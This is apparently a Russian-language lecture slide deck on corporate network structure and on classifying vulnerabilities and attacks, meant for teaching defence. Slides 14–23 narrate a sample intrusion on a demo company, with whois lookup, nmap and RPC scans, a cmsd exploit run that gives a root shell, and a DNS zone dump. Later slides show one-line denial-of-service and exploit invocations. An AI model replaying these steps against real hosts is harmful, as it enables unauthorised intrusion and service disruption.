Презентация "Типовая корпоративная сеть, понятие уязвимости и атаки - 2" - скачать презентации по Информатике

Содержание

Слайд 2

Типовая корпоративная сеть Внутренние серверы Рабочие места МЭ

Типовая корпоративная сеть

Внутренние серверы

Рабочие места

МЭ

Слайд 3

Уровни информационной инфраструктуры

Уровни информационной инфраструктуры

Слайд 4

Уровни информационной инфраструктуры TCP/IP NetBEUI IPX/SPX

Уровни информационной инфраструктуры

TCP/IP
NetBEUI
IPX/SPX

Слайд 5

Уровни информационной инфраструктуры

Уровни информационной инфраструктуры

Слайд 6

Уровни информационной инфраструктуры

Уровни информационной инфраструктуры

Слайд 7

Уровни информационной инфраструктуры Office 2000

Уровни информационной инфраструктуры

Office 2000

Слайд 8

Уровни информационной инфраструктуры

Уровни информационной инфраструктуры

Слайд 9

Классификация уязвимостей и атак Раздел 1 – Тема 3

Классификация уязвимостей и атак

Раздел 1 – Тема 3

Слайд 10

Примерный сценарий атаки Сбор информации Получение доступа к наименее защищённому узлу

Примерный сценарий атаки

Сбор информации

Получение доступа к наименее защищённому узлу (возможно с

минимальными привилегиями)

Получение полного контроля над одним из узлов или несколькими

Повышение уровня привилегий или использование узла в качестве платформы для исследования других узлов сети

Слайд 11

Этап сбора информации

Этап сбора информации

Слайд 12

Слайд 13

ACMETRADE.COM

ACMETRADE.COM

Слайд 14

Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338

Registrant:
Acmetrade.com, Inc. (ACMETRADE-DOM)
6600 Peachtree Dunwoody Road
Atlanta, GA 30338
Domain

Name: ACMETRADE.COM
Administrative Contact:
Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM
(678)443-6000 (FAX) (678) 443-6476
Technical Contact, Zone Contact:
Bergman, Bret (ET2324) bbergman@ACMETRADE.COM
(678)443-6100 (FAX) (678) 443-6208
Billing Contact:
Fields, Hope (ET3427) hfields@ACMETRADE.COM
(678)443-6101 (FAX) (678) 443-6401
Record Last updated on 27-Jul-99.
Record created on 06-Mar-98.
Database last updated on 4-Oct-99 09:09:01 EDT
Domain servers in listed order:
dns.acmetrade.com 208.21.2.67
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com

Слайд 15

Слайд 16

Слайд 17

Слайд 18

[hacker@linux131 hacker]$ nmap 200.0.0.143 Starting nmap V. 2.53 by fyodor@insecure.org (

[hacker@linux131 hacker]$ nmap 200.0.0.143
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/

)
Interesting ports on (200.0.0.143):
(The 1516 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
465/tcp open smtps
Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
[hacker@linux131 hacker]$
Слайд 19

hacker:/export/home/hacker> ./rpcscan dns.acmetrade.com cmsd Scanning dns.acmetrade.com for program 100068 cmsd is on port 33505 hacker:/export/home/hacker>

hacker:/export/home/hacker>

./rpcscan dns.acmetrade.com cmsd

Scanning dns.acmetrade.com for program 100068
cmsd is on port 33505

hacker:/export/home/hacker>

Слайд 20

Слайд 21

Слайд 22

hacker:/export/home/hacker> id uid=1002(hacker) gid=10(staff) hacker:/export/home/hacker> uname -a SunOS evil.hacker.com 5.6 Generic_105181-05

hacker:/export/home/hacker>

id

uid=1002(hacker) gid=10(staff)

hacker:/export/home/hacker>

uname -a

SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine

hacker:/export/home/hacker>

./cmsd dns.acmetrade.com

using source

port 53
rtable_create worked
Exploit successful. Portshell created on port 33505

hacker:/export/home/hacker>

Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.

#

id

uid=0(root) gid=0(root)

#

uname -a

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

#

telnet dns.acmetrade.com 33505

Этап получения доступа к узлу

Слайд 23

# # nslookup Default Server: dns.acmetrade.com Address: 208.21.2.67 > > ls

#

#

nslookup

Default Server: dns.acmetrade.com
Address: 208.21.2.67

>

>

ls acmetrade.com

Received 15 records.

^D

[dns.acmetrade.com]

www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103
margin.acmetrade.com 208.21.4.10
marketorder.acmetrade.com 208.21.2.62
deriv.acmetrade.com 208.21.2.25
deriv1.acmetrade.com 208.21.2.13
bond.acmetrade.com 208.21.2.33
ibd.acmetrade.com 208.21.2.27
fideriv.acmetrade.com 208.21.4.42
backoffice.acmetrade.com 208.21.4.45
wiley.acmetrade.com 208.21.2.29
bugs.acmetrade.com 208.21.2.89
fw.acmetrade.com 208.21.2.94
fw1.acmetrade.com 208.21.2.21

Использование узла в качестве платформы

для исследования других узлов сети
Слайд 24

(AcmeTrade’s Network) UNIX Firewall DNS Server Web Server Filtering Router NT

(AcmeTrade’s Network)

UNIX
Firewall

DNS Server

Web Server

Filtering Router

NT

Clients & Workstations

Network

UNIX

NT

UNIX

Схема сети

Слайд 25

Уязвимости и атаки Атака - действие нарушителя, которое приводит к реализации

Уязвимости и атаки


Атака - действие нарушителя, которое приводит к реализации

угрозы путем использования уязвимостей информационной системы.

Уязвимость - любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы.

Слайд 26

Классификация уязвимостей узлов, протоколов и служб IP - сетей

Классификация уязвимостей
узлов, протоколов и служб IP - сетей

Слайд 27

Классификация уязвимостей по причинам возникновения ошибки проектирования (технологий, протоколов, служб) ошибки

Классификация уязвимостей по причинам возникновения

ошибки проектирования (технологий, протоколов, служб)
ошибки реализации

(программ)
ошибки эксплуатации (неправильная настройка, неиспользуемые сетевые службы, слабые пароли)
Слайд 28

Классификация по уровню в информационной инфраструктуре Уровень сети Уровень операционной системы

Классификация по уровню в информационной инфраструктуре

Уровень сети

Уровень операционной системы

Уровень баз данных

Уровень

персонала

Уровень приложений

Слайд 29

Высокий уровень риска Средний уровень риска Низкий уровень риска Классификация уязвимостей

Высокий уровень риска

Средний уровень риска

Низкий уровень риска

Классификация уязвимостей по уровню (степени)

риска

Уязвимости, позволяющие атакующему получить непосредственный доступ у узлу с правами суперпользователя

Уязвимости, позволяющие атакующему получить доступ к информации, которая с высокой степенью вероятности позволит в последствии получить доступ к узлу

Уязвимости, позволяющие злоумышленнику осуществлять сбор критичной информации о системе

Слайд 30

Источники информации о новых уязвимостях www.cert.org - координационный центр CERT/CC www.iss.net/xforce

Источники информации
о новых уязвимостях

www.cert.org - координационный центр CERT/CC

www.iss.net/xforce -

база данных компании ISS

llnl.ciac.gov - центр CIAC

www.cert.ru - российский CERT/CC

www.securityfocus.com

Слайд 31

www.iss.net/xforce

www.iss.net/xforce

Слайд 32

Примеры уязвимостей Уровень: сеть Степень риска: средняя Источник возникновения: ошибки реализации

Примеры уязвимостей

Уровень: сеть

Степень риска: средняя

Источник возникновения: ошибки реализации

Описание: посылка большого числа

одинаковых фрагментов IP-датаграммы приводит к недоступности узла на время атаки
Слайд 33

Уровень: ОС Степень риска: высокая Источник возникновения: ошибки реализации Описание: проблема

Уровень: ОС

Степень риска: высокая

Источник возникновения: ошибки реализации

Описание: проблема одной из функций

ядра ОС Windows NT, позволяющая злоумышленнику получить привилегии администратора

Примеры уязвимостей

Слайд 34

Уровень: СУБД Степень риска: низкая Источник возникновения: ошибки реализации Описание: уязвимость

Уровень: СУБД

Степень риска: низкая

Источник возникновения: ошибки реализации

Описание: уязвимость в реализации возможности

подключения со стороны других SQL-серверов

Примеры уязвимостей

Слайд 35

Уровень: приложения Степень риска: средняя Источник возникновения: ошибки реализации Описание: посылка

Уровень: приложения

Степень риска: средняя

Источник возникновения: ошибки реализации

Описание: посылка большого числа некорректно

построенных запросов приводит к повышенному расходу ресурсов процессора

Примеры уязвимостей

Слайд 36

Уровень: приложения Степень риска: средняя Источник возникновения: ошибки реализации Описание: OC

Уровень: приложения

Степень риска: средняя

Источник возникновения: ошибки реализации

Описание: OC Windows 2000 и

Windows 98 уязвимы к атаке «отказ в обслуживании», вызываемой исчерпанием всех UDP-сокетов

Примеры уязвимостей

Слайд 37

Уровень: Персонал Степень риска: высокая Источник возникновения: ошибки обслуживания Описание: узел

Уровень: Персонал

Степень риска: высокая

Источник возникновения: ошибки обслуживания

Описание: узел заражён серверной частью

троянского коня, позволяющей установить полный контроль над узлом

Примеры уязвимостей

Слайд 38

http://cve.mitre.org/cve Единая система наименований для уязвимостей Стандартное описание для каждой уязвимости Обеспечение совместимости баз данных уязвимостей

http://cve.mitre.org/cve

Единая система наименований для уязвимостей

Стандартное описание для каждой уязвимости

Обеспечение совместимости баз

данных уязвимостей
Слайд 39

http://cve.mitre.org/cve CAN-1999-0067 CVE-1999-0067 Кандидат CVE Индекс CVE

http://cve.mitre.org/cve

CAN-1999-0067

CVE-1999-0067

Кандидат CVE

Индекс CVE

Слайд 40

Ситуация без CVE ISS RealSecure CERT Advisory Cisco Database Axent NetRecon

Ситуация без CVE

ISS RealSecure

CERT Advisory

Cisco Database

Axent NetRecon

land attack (spoofed SYN)

Impossible IP

Packet

Bugtrag

CA-97.28.Teardrop_Land

Land

NT4-SP3and 95 [latierra.c]

Уязвимость Land IP denial of service

Слайд 41

Поддержка CVE CVE-1999-0016 Land IP denial of service CVE CERT Advisory

Поддержка CVE

CVE-1999-0016 Land IP denial of service

CVE

CERT Advisory

Bugtrag

ISS RealSecure

Cisco Database

Axent NetRecon

Слайд 42

CVE entry CVE-1999-0005 Arbitrary command execution via IMAP buffer overflow in

CVE entry

CVE-1999-0005
Arbitrary command execution via IMAP
buffer overflow in authenticate command.
Reference:

CERT:CA-98.09.imapd
Reference: SUN:00177
Reference: BID:130
Reference: XF:imap-authenticate-bo

Номер

Описание

Ссылки

Слайд 43

Классификация атак в IP- сетях

Классификация атак в IP- сетях

Слайд 44

Классификация атак по целям Нарушение нормального функционирования объекта атаки (отказ в

Классификация атак по целям

Нарушение нормального функционирования
объекта атаки (отказ в

обслуживании)

Получение конфиденциальной информации

Модификация или фальсификация
критичных данных

Получение полного контроля над
объектом атаки

Слайд 45

Классификация атак по местонахождению атакующего и объекта атаки Атакующий и объект

Классификация атак по местонахождению атакующего и объекта атаки

Атакующий и объект атаки

находятся в одном сегменте

Атакующий и объект атаки находятся в разных сегментах

Маршру-тизатор

Слайд 46

Классификация атак по механизмам реализации Пассивное прослушивание

Классификация атак по механизмам реализации

Пассивное прослушивание

Слайд 47

DMZ-1 Пассивное прослушивание Внутренние серверы МЭ

DMZ-1

Пассивное прослушивание

Внутренние серверы

МЭ

Слайд 48

Классификация атак по механизмам реализации Подозрительная активность (разведка) Пассивное прослушивание

Классификация атак по механизмам реализации

Подозрительная активность (разведка)

Пассивное прослушивание

Слайд 49

Подозрительная активность Внутренние серверы Рабочие места МЭ # nmap www.company.com

Подозрительная активность

Внутренние серверы

Рабочие места

МЭ

# nmap www.company.com

Слайд 50

Классификация атак по механизмам реализации Подозрительная активность (разведка) Бесполезное расходование вычислительных ресурсов (перегрузка) Пассивное прослушивание

Классификация атак по механизмам реализации

Подозрительная активность (разведка)

Бесполезное расходование вычислительных ресурсов (перегрузка)

Пассивное

прослушивание
Слайд 51

Перегрузка Внутренние серверы Рабочие места МЭ # ./neptun www.company.com

Перегрузка

Внутренние серверы

Рабочие места

МЭ

# ./neptun www.company.com

Слайд 52

Классификация атак по механизмам реализации Подозрительная активность (разведка) Бесполезное расходование вычислительных

Классификация атак по механизмам реализации

Подозрительная активность (разведка)

Бесполезное расходование вычислительных ресурсов (перегрузка)

Нарушение

навигации (ложный маршрут)

Пассивное прослушивание

Слайд 53

Нарушение навигации Внутренние серверы Рабочие места МЭ DNS сервер

Нарушение навигации

Внутренние серверы

Рабочие места

МЭ

DNS
сервер

Слайд 54

Классификация атак по механизмам реализации Провоцирование отказа объекта (компонента) Подозрительная активность

Классификация атак по механизмам реализации

Провоцирование отказа объекта (компонента)

Подозрительная активность (разведка)

Бесполезное расходование

вычислительных ресурсов (перегрузка)

Нарушение навигации (ложный маршрут)

Пассивное прослушивание

Слайд 55

Провоцирование отказа Внутренние серверы Рабочие места МЭ # nuke www.company.com

Провоцирование отказа

Внутренние серверы

Рабочие места

МЭ

# nuke www.company.com

Слайд 56

Классификация атак по механизмам реализации Провоцирование отказа объекта (компонента) Подозрительная активность

Классификация атак по механизмам реализации

Провоцирование отказа объекта (компонента)

Подозрительная активность (разведка)

Запуск кода

(программы) на объекте атаки

Бесполезное расходование вычислительных ресурсов (перегрузка)

Нарушение навигации (ложный маршрут)

Пассивное прослушивание

Слайд 57

Запуск кода Внутренние серверы Рабочие места МЭ # exploit www.company.com

Запуск кода

Внутренние серверы

Рабочие места

МЭ

# exploit www.company.com

Слайд 58

Классификация атак по механизмам реализации Провоцирование отказа объекта (компонента) Подозрительная активность

Классификация атак по механизмам реализации

Провоцирование отказа объекта (компонента)

Подозрительная активность (разведка)

Запуск кода

(программы) на объекте атаки

Бесполезное расходование вычислительных ресурсов (перегрузка)

Нарушение навигации (ложный маршрут)

Пассивное прослушивание

Слайд 59

Статистика по уязвимостям и атакам за 2000 год Источник: Internet Security Systems

Статистика по уязвимостям
и атакам

за 2000 год

Источник: Internet Security Systems